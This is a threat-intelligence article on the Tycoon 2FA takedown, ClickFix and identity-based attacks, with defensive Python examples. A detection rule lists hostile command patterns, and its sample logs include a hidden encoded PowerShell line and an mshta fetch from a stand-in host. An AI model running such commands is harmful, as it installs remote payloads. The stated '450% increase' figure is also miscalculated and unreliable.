The new era of industrialized cybercrime: identity, AI, and the fall of Tycoon 2FA

In today’s cybersecurity landscape, organizations are no longer facing isolated individuals but rather a highly specialized and scalable fraud economy. The latest threat intelligence reports reveal that attackers’ objectives have fundamentally changed: today, adversaries are no longer trying to “break into” systems—they are simply trying to “log in.”

1. Tycoon 2FA: the factory of stolen identities

The recent takedown of Tycoon 2FA by a coalition led by Microsoft and Europol offers a unique glimpse into modern cybercriminal sophistication. This platform operated under the “Phishing-as-a-Service” (PhaaS) model, enabling criminals with little technical expertise to launch large-scale attacks.

What made Tycoon 2FA particularly dangerous was its ability to bypass multi-factor authentication (MFA). Using a technique known as Adversary-in-the-Middle (AiTM), the kit intercepted security codes and session tokens in real time, allowing attackers to access protected Microsoft 365 or Gmail accounts without triggering alarms. At its peak, this network impacted more than 500,000 organizations every month.

2. The end of obvious deception: AI and ClickFix

Artificial intelligence has transformed phishing from poorly written emails into a precision-engineered attack tool. AI-assisted campaigns now achieve click-through rates of 54%, compared to 12% for traditional methods—representing a 450% increase in attack effectiveness.

In addition, a new dominant tactic called ClickFix has emerged. This method accounts for 47% of recently observed initial access attempts. Instead of requesting a password, it tricks users into copying and pasting a “support code” or “update” directly into the Windows Run command window (Win + R). By doing so, employees unknowingly execute malware themselves, allowing it to load directly into system memory and evade traditional antivirus solutions.
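The sequence described above leaves a recognisable trace in endpoint telemetry: because the victim types into the Run dialog, the desktop shell (explorer.exe) becomes the parent of a script interpreter or download utility started with hidden, encoded or URL-carrying arguments. The following detection logic is an added example written for this article, not code from the page or from Microsoft; the event field names mimic Sysmon process-creation events but are an assumption, the indicator weights and threshold are this example's own, and the log lines are constructed samples rather than real telemetry.

```python
"""Flag ClickFix-style execution: explorer.exe spawning an interpreter with
download / hidden / encoded arguments. Added defender-side example; field
names and sample events are constructed, not real telemetry."""
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Interpreters and fetch utilities commonly launched from the Run dialog.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (pattern, weight, label). Patterns are deliberately generic; the PowerShell
# switches cover only the common abbreviations.
INDICATORS = [
    (re.compile(r"(?:^|\s)-(?:w|windowstyle)\s+hidden\b", re.I), 2, "hidden window"),
    (re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I), 3, "encoded command"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I), 3, "remote download"),
    (re.compile(r"https?://", re.I), 2, "url in command line"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "in-memory execution"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), 4, "mshta remote payload"),
]
THRESHOLD = 5  # assumed tuning value; raise or lower against your own baseline


@dataclass
class Finding:
    record_id: str
    user: str
    image: str
    score: int
    reasons: List[str]


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Finding]:
    """Return a Finding when the event looks like ClickFix execution, else None."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    # ClickFix relies on the user typing into the Run dialog, so the interpreter's
    # parent is the desktop shell rather than a mail client, browser or IDE.
    if parent != "explorer.exe" or image not in LOLBINS:
        return None
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    if score < THRESHOLD:
        return None
    return Finding(ev.get("RecordId", "?"), ev.get("User", "?"), image, score, reasons)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run the rule over JSON-lines telemetry, skipping blank or malformed lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed record: skip rather than stop the pipeline
        finding = score_event(ev)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (JSON lines); hostnames use the reserved .invalid TLD.
SAMPLE_LOG = r"""
{"RecordId":"1","User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -w hidden -enc QUJDRA=="}
{"RecordId":"2","User":"CORP\\bob","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta http://update.example.invalid/fix"}
{"RecordId":"3","User":"CORP\\carol","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt"}
{"RecordId":"4","User":"CORP\\dave","ParentImage":"C:\\Program Files\\VSCode\\Code.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -File build.ps1"}
{"RecordId":"5","User":"CORP\\erin","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c dir"}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"ALERT record={f.record_id} user={f.user} image={f.image} "
              f"score={f.score} reasons={', '.join(f.reasons)}")
```

Records 1 and 2 are flagged; the developer running a build script from an IDE (record 4) and the plain `dir` (record 5) are not, which is the point of requiring both the explorer.exe parent and a weighted combination of indicators rather than any single string. For forensic corroboration after an alert, the Run dialog also keeps what the user typed under the RunMRU key in that user's registry hive.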

3. Identity as the new perimeter

While 99% of identity-based attacks can be blocked through the use of MFA, the industrialization of tools such as Tycoon 2FA is forcing organizations to raise the bar. The trend is clear: identity — not infrastructure — is now the primary target.

Organizations are experiencing a shift in the nature of security breaches:

  • Hybrid attacks: 40% of ransomware attacks now involve hybrid components, where attackers use compromised identities to pivot from on-premises servers into Azure cloud environments.
  • Workload identities: As employee security improves, criminals are increasingly targeting “machine identities,” such as applications and scripts with elevated privileges but weak security controls.
  • Speed of impact: Attacker dwell times continue to shrink. In 46% of incidents, intrusions are detected in less than 48 hours, demanding near-instant response capabilities.

4. Emerging threats: from deepfakes to infiltrators

The threat ecosystem has diversified with state-sponsored actors and new forms of fraud:

  • Technical support deepfakes: Scammers now use AI-generated voices to impersonate technical support agents in phone calls or Microsoft Teams meetings, dramatically increasing victim trust.
  • The remote worker challenge: A growing trend has been identified involving IT workers sponsored by nation-states infiltrating legitimate companies using false identities to generate revenue or conduct espionage.
  • Cloud attacks: Destructive campaigns targeting cloud environments — such as mass deletion of Azure data — have increased by 87% over the past year.

5. Strategic recommendations for leadership

Cybersecurity is no longer just a technical issue; it is a business continuity risk that must be managed at the board level. To navigate this environment, we recommend:

  • Adopt phishing-resistant MFA: Traditional methods (such as SMS or basic push notifications) are no longer sufficient. Organizations should migrate to standards such as FIDO2 or Windows Hello for Business, which cannot be intercepted by AiTM kits.
  • Achieve full visibility: What cannot be seen cannot be defended. It is critical to inventory not only physical assets but also every application, API, and cloud service with access to company data.
  • Build a culture of vigilance: Since attackers increasingly rely on human deception tactics like ClickFix, employee training must evolve from theory-based awareness to practical simulations and the promotion of a culture where reporting suspicious activity is encouraged and rewarded.
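The AiTM interception described in section 1 and the phishing-resistant MFA recommendation above are two sides of the same mechanism, and a small simulation makes it concrete. A one-time code is just a string: whoever the victim types it into can forward it to the real site within the validity window, and the server cannot tell. A FIDO2/WebAuthn assertion is different because the browser, not the user, writes the origin of the page it is on into the signed client data, and the relying party rejects any origin other than its own. The code below is an added illustration, not code from the page, from Microsoft or from any FIDO library: the TOTP routine follows the RFC 6238 shape but is shortened, the "signature" is an HMAC stand-in for the authenticator's private-key signature over the same bytes a real authenticator signs, and all hostnames, secrets and function names are constructed.

```python
"""Why a relayed one-time code passes but an origin-bound WebAuthn assertion
does not. Added illustration; the HMAC below stands in for the authenticator's
asymmetric signature and every hostname and secret is constructed."""
import hashlib
import hmac
import json
import struct
from dataclasses import dataclass

LEGIT_ORIGIN = "https://login.example.com"                   # constructed
PROXY_ORIGIN = "https://login.example-com.attacker.invalid"  # constructed


def rp_id_of(origin: str) -> str:
    """Relying-party id is the host part of the origin (no scheme, no port)."""
    return origin.split("://", 1)[1].split(":", 1)[0]


# ---- Factor type 1: a TOTP-style code (RFC 6238 shape, simplified) ---------
def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return f"{code:0{digits}d}"


def verify_totp(server_secret: bytes, code: str, now: int) -> bool:
    """The server only sees six digits; nothing ties them to where they were typed."""
    return hmac.compare_digest(code, totp(server_secret, now))


# ---- Factor type 2: a WebAuthn-style assertion -----------------------------
@dataclass
class Assertion:
    client_data: bytes   # JSON: type, challenge and the origin the BROWSER observed
    auth_data: bytes     # sha256(rpId) || flags || signature counter
    signature: bytes     # over auth_data || sha256(client_data)


def browser_get_assertion(page_origin: str, challenge: str, cred_key: bytes) -> Assertion:
    """The browser fills in origin and rpId from the page it is on; the user cannot override them."""
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}, sort_keys=True).encode()
    auth_data = hashlib.sha256(rp_id_of(page_origin).encode()).digest() + b"\x01" + b"\x00\x00\x00\x01"
    # Stand-in for the private-key signature (real authenticators use e.g. ES256).
    signature = hmac.new(cred_key, auth_data + hashlib.sha256(client_data).digest(),
                         hashlib.sha256).digest()
    return Assertion(client_data, auth_data, signature)


def verify_assertion(a: Assertion, expected_origin: str, challenge: str, cred_key: bytes) -> bool:
    """Relying-party checks in the order WebAuthn specifies them: type, challenge, origin, rpIdHash, signature."""
    cd = json.loads(a.client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != challenge:
        return False
    if cd.get("origin") != expected_origin:  # origin binding: a proxy page fails here
        return False
    if a.auth_data[:32] != hashlib.sha256(rp_id_of(expected_origin).encode()).digest():
        return False
    expected = hmac.new(cred_key, a.auth_data + hashlib.sha256(a.client_data).digest(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(a.signature, expected)


# ---- Simulation: victim is on the proxy page, proxy relays to the real site ----
def relayed_totp_accepted(now: int = 1_700_000_000) -> bool:
    secret = b"shared-otp-seed"                  # constructed
    code_typed_into_proxy = totp(secret, now)    # victim reads it from their app
    return verify_totp(secret, code_typed_into_proxy, now)  # forwarded unchanged: accepted


def relayed_webauthn_accepted() -> bool:
    cred_key = b"credential-key"                 # constructed
    challenge = "c29tZS1jaGFsbGVuZ2U"            # issued by the real site, forwarded by the proxy
    a = browser_get_assertion(PROXY_ORIGIN, challenge, cred_key)  # browser binds it to the proxy
    return verify_assertion(a, LEGIT_ORIGIN, challenge, cred_key)


def direct_webauthn_accepted() -> bool:
    cred_key = b"credential-key"
    challenge = "c29tZS1jaGFsbGVuZ2U"
    a = browser_get_assertion(LEGIT_ORIGIN, challenge, cred_key)
    return verify_assertion(a, LEGIT_ORIGIN, challenge, cred_key)


if __name__ == "__main__":
    print("relayed TOTP accepted:    ", relayed_totp_accepted())
    print("relayed WebAuthn accepted:", relayed_webauthn_accepted())
    print("direct WebAuthn accepted: ", direct_webauthn_accepted())
```

In a real browser the failure happens even earlier than the relying party's origin check: a credential registered for login.example.com is scoped to that rpId, so the browser will not offer it on the proxy's domain at all. Either way there is nothing for the kit to forward, which is what "phishing-resistant" means in practice; note that it protects the authentication step, so session tokens issued afterwards still need their own protections such as short lifetimes and device or IP binding.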

Conclusion

Although the threat landscape appears increasingly challenging, the successful disruption of networks such as Tycoon 2FA demonstrates that global collaboration and intelligence-driven defense remain powerful tools. Cyber resilience is not about preventing every attack — it is about being prepared to withstand, recover, and adapt at the same speed as our adversaries.

Sources:

  • Microsoft On the Issues (2026). Defending the gates: How a global coalition disrupted Tycoon 2FA, a major driver of initial access and large-scale online impersonation.
  • Microsoft Security Blog (2026). Inside Tycoon2FA: How a leading AiTM phishing kit operated at scale.
  • Microsoft Threat Intelligence (2025). Microsoft Digital Defense Report 2025: Lighting the path to a secure future.
